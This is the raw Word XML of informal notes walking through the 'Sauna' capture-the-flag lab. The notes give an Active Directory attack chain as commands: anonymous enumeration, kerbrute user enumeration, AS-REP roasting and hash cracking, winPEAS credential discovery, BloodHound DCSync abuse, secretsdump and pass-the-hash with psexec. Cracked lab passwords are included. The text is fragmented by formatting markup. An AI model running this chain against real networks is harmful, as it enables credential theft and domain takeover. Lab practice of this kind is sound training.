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3A7A0DAF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0D30DF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sauna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50016ECC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0D30DF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002B5B8D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This machine is the perfect example of how to create the passwords by just some leaked name on there websites to create into the perfect enumeration shell.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A8808E9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0D30DF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62BA510D" w:rsidR="00843DCE" w:rsidRDefault="000032A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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DE610E" w14:textId="3E95B948" w:rsidR="000D30DF" w:rsidRDefault="000C7C4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‘’ -p ‘’ –shares = its not</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2669BF7A" w14:textId="2300AD3E" w:rsidR="000C7C49" w:rsidRDefault="006E245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smbmap -I t_ip -u ‘’ -p ‘’</w:t>
      </w:r>
      <w:r w:rsidR="001715D7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = again its not provide anything</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48181D78" w14:textId="6C292ABE" w:rsidR="001715D7" w:rsidRDefault="00C3039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rpcclient t_ip -U ‘’ = it also not</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4684BC6C" w14:textId="244CB84B" w:rsidR="00C3039B" w:rsidRDefault="008B076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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705DA709" w14:textId="509ACC8E" w:rsidR="008B0760" w:rsidRDefault="008B076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it’s the same page where we visit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEBA327" w14:textId="3429D83E" w:rsidR="008B0760" w:rsidRDefault="008B076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obtain the username under images</w:t>
      </w:r>
      <w:r w:rsidR="00F553EB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = user</w:t>
      </w:r>
      <w:r w:rsidR="00EC78FF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A857EE0" w14:textId="5044462E" w:rsidR="00F553EB" w:rsidRDefault="00270DD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-x -h t_ip -s base naming</w:t>
      </w:r>
      <w:r w:rsidR="008713E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ontext</w:t>
      </w:r>
      <w:r w:rsidR="008713E6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00500265">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = obtain DC=xxxx,DC=xx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A504480" w14:textId="69D69A76" w:rsidR="000D30DF" w:rsidRDefault="0050026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ldapsearch -x -h t_ip -b ‘DC=xxxx,DCxx’ -s sub = sometimes username is there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2F25110" w14:textId="6286D642" w:rsidR="002B5B8D" w:rsidRPr="002B5B8D" w:rsidRDefault="00843DCE" w:rsidP="002B5B8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651C9E90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open that user.txt file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FBECA8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esc = @a = to start micro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB2A38C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3p = to put </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C392CBD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 space = at the space point cursor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68764AAA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dw4 = delete 4 world  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1B4D47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 = insert</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B705763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esc q = exit recording mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD54C73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final</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E2CFAA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Fergus Smith</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C457836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Fergus.Smith</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70218615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FSmith</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5121C4FF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F.Smith</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178F3DBC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make sure remove all space after the worlds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4019A1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move from the insert mode just enter @ it replace same for all where we click</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F242881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all at same time number @ = 5@ for 5 names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64F4A319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kerbrute pre-authentication attack :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1821EA4C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we have valid username then it reply with please continue with authentication. If user not valid then it refuse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682634E2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github kerbrute = download kerbrute_linux_amd64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC7A2B0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chmod +x main folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B8F296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mv kerbrute_linux_amd64 kerbrute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3F2442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./kerbrute userenum -h </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545EC18E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./kerbrute userenum - -dc t_ip -d EGOTISTICAL.BANK.LOCAL user.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52344CA9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FSmith is valid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6DD4B3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impacket-GetNPUsers EGOTISTICAL-BANK.LOCAL/fsmith = we obtain the hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F85A0AE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hashcat - -example-hashes | less asrep = and its 18200</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44722241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hashcat -m 18200 hash rockyou.txt = Thestrokes23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6998F8F1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fsmith  -p paste</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9333E2" w14:textId="77777777" w:rsidR="002B5B8D" w:rsidRDefault="002B5B8D" w:rsidP="002B5B8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 it with winrm </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CC8CBC" w14:textId="4A0ED00A" w:rsidR="00843DCE" w:rsidRDefault="002B5B8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user.txt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22FACDBD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fsmith  -p paste - -shares</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB39E62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RICHO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CFDD76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searchsploit RICHO = we obtain richo printer drivers = local priviledge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6FB2C2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the path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1429B3D7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searchsploit -x path = just noted that we will use it in future for priviledge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE50038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winPEAS.exe = priviledge-escalation-awesome-scripts-suite we can clone it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52463843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upload winPEAS.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE94CF6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./winPEAS.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133A656B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ontain userid and password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42516AA6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svc_loanmanager:Moneymakestheworldgoround!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487545A9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upload sharphound to shell and start bloodhound with neo4j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FE38B0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14D19F0B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./sharphound.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CF1A13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xxxxx.bloodhound.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2823C4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download it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF10061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drop to the bloodhound GUI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA84B79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principal withDCSync right</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356450AD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see the script in abuse info  copy it and run it in shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6477D004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</w:p>
    <w:p w14:paraId="63741B1E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secretsdump.py egotistical-bank.local/avc_loanmgre@t_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78413CCA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paste the password of that user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C60AFD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hash of the administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA0849F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smb t_ip -u administrator -H paste = and its pwn3d!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520C9337" w14:textId="77777777" w:rsidR="00292265" w:rsidRDefault="00292265" w:rsidP="0029226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impacket-psexec -hashes paste:paste </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00B66AEF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>egotistical-banl.local/administrator@t_ip</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="05C2DC30" w14:textId="2947AC94" w:rsidR="00843DCE" w:rsidRDefault="0029226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root.txt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69263E7D" w:rsidR="00843DCE" w:rsidRDefault="0029226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desktop we notice the root.txt flag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32AC"/>
    <w:rsid w:val="00097523"/>
    <w:rsid w:val="000C3180"/>
    <w:rsid w:val="000C4DC9"/>
    <w:rsid w:val="000C7C49"/>
    <w:rsid w:val="000D30DF"/>
    <w:rsid w:val="00142BA6"/>
    <w:rsid w:val="001715D7"/>
    <w:rsid w:val="00225788"/>
    <w:rsid w:val="00270DDC"/>
    <w:rsid w:val="00292265"/>
    <w:rsid w:val="002B1B2F"/>
    <w:rsid w:val="002B5B8D"/>
    <w:rsid w:val="0035287E"/>
    <w:rsid w:val="0035289C"/>
    <w:rsid w:val="00361BA6"/>
    <w:rsid w:val="00373885"/>
    <w:rsid w:val="00402121"/>
    <w:rsid w:val="00415129"/>
    <w:rsid w:val="00425925"/>
    <w:rsid w:val="00427E37"/>
    <w:rsid w:val="0044496F"/>
    <w:rsid w:val="00482779"/>
    <w:rsid w:val="004A2C2A"/>
    <w:rsid w:val="00500265"/>
    <w:rsid w:val="00566D00"/>
    <w:rsid w:val="005F3540"/>
    <w:rsid w:val="005F435B"/>
    <w:rsid w:val="0060632F"/>
    <w:rsid w:val="00631549"/>
    <w:rsid w:val="00651E85"/>
    <w:rsid w:val="006C0C0C"/>
    <w:rsid w:val="006E2455"/>
    <w:rsid w:val="00732F5B"/>
    <w:rsid w:val="007A2A9D"/>
    <w:rsid w:val="007F6B8A"/>
    <w:rsid w:val="0082785F"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="008713E6"/>
    <w:rsid w:val="00871EDB"/>
    <w:rsid w:val="008B0760"/>
    <w:rsid w:val="009575BE"/>
    <w:rsid w:val="009C6F5D"/>
    <w:rsid w:val="009F4254"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A5666B"/>
    <w:rsid w:val="00AB1E0D"/>
    <w:rsid w:val="00B10949"/>
    <w:rsid w:val="00B40A69"/>
    <w:rsid w:val="00B61675"/>
    <w:rsid w:val="00BE1A84"/>
    <w:rsid w:val="00BE5A9A"/>
    <w:rsid w:val="00BE673C"/>
    <w:rsid w:val="00C00A06"/>
    <w:rsid w:val="00C3039B"/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rsid w:val="00DD5E95"/>
    <w:rsid w:val="00E05EC6"/>
    <w:rsid w:val="00E10412"/>
    <w:rsid w:val="00E400B8"/>
    <w:rsid w:val="00E9425D"/>
    <w:rsid w:val="00EC78FF"/>
    <w:rsid w:val="00ED1F7D"/>
    <w:rsid w:val="00F553EB"/>
    <w:rsid w:val="00F578D1"/>
    <w:rsid w:val="00F6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A06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gotistical-banl.local/administrator@t_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65</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-25T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-25T16:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>